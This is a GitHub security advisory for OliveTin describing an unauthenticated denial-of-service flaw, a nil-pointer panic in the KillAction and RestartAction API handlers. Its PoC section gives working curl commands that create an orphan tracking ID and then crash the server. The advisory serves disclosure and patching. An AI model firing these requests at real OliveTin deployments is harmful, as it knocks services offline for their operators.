Skip to content

OliveTin has crash on NPE by calling APIs with invalid bindings or log references

Moderate severity GitHub Reviewed Published Mar 5, 2026 in OliveTin/OliveTin • Updated Mar 5, 2026

Package

gomod github.com/OliveTin/OliveTin (Go)

Affected versions

< 0.0.0-20260304225158-bb14c5da3e64

Patched versions

0.0.0-20260304225158-bb14c5da3e64

Description

Summary

An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via StartActionByGet (invalid action ID), then calling KillAction or RestartAction on that tracking ID. This causes a nil-pointer dereference in API handlers and results in repeated per-request panics (Empty reply from server), enabling denial of service through panic/log/CPU amplification.

Details

The issue is caused by this flow:

  1. StartActionByGet accepts arbitrary actionId and still calls executor:

    • service/internal/api/api.go:239

  2. Executor stores a log entry before binding validation:

    • service/internal/executor/executor.go:519

  3. If binding is nil, execution stops, but the log entry remains:

    • service/internal/executor/executor.go:781

  4. KillAction dereferences execReqLogEntry.Binding.Action without checking Binding:

    • service/internal/api/api.go:79

  5. RestartAction has the same unsafe dereference:

    • service/internal/api/api.go:1285

Because the dereference happens before authorization checks in these handlers, this is reachable unauthenticated.

PoC

Environment:

  • OliveTin default single frontend on http://localhost:1337
  • Reproduced on main (commit 235493e) and tag 3000.11.0
  1. Create orphan tracking ID with invalid action:
T=$(curl -s -X POST http://localhost:1337/api/StartActionByGet \
  -H 'Content-Type: application/json' \
  --data '{"actionId":"does-not-exist"}' \
  | sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p')
echo "$T"

2. Trigger panic in RestartAction:

curl -v -X POST http://localhost:1337/api/RestartAction \
  -H 'Content-Type: application/json' \
  --data "{\"executionTrackingId\":\"$T\"}"

3. Trigger panic in KillAction:

curl -v -X POST http://localhost:1337/api/KillAction \
  -H 'Content-Type: application/json' \
  --data "{\"executionTrackingId\":\"$T\"}"

Observed client output:

- curl: (52) Empty reply from server

Observed server log:

- panic serving ... runtime error: invalid memory address or nil pointer dereference
- stack points to:
    - service/internal/api/api.go:79 (KillAction)
    - service/internal/api/api.go:1285 (RestartAction)

Impact

This is an unauthenticated denial-of-service vulnerability (panic-based request disruption and log/CPU amplification). An attacker can repeatedly trigger panics remotely without credentials, degrading service reliability and observability.

References

@jamesread jamesread published to OliveTin/OliveTin Mar 5, 2026
Published to the GitHub Advisory Database Mar 5, 2026
Reviewed Mar 5, 2026
Last updated Mar 5, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

EPSS score

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

NULL Pointer Dereference

The product dereferences a pointer that it expects to be valid but is NULL. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-fwhj-785h-43hh

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.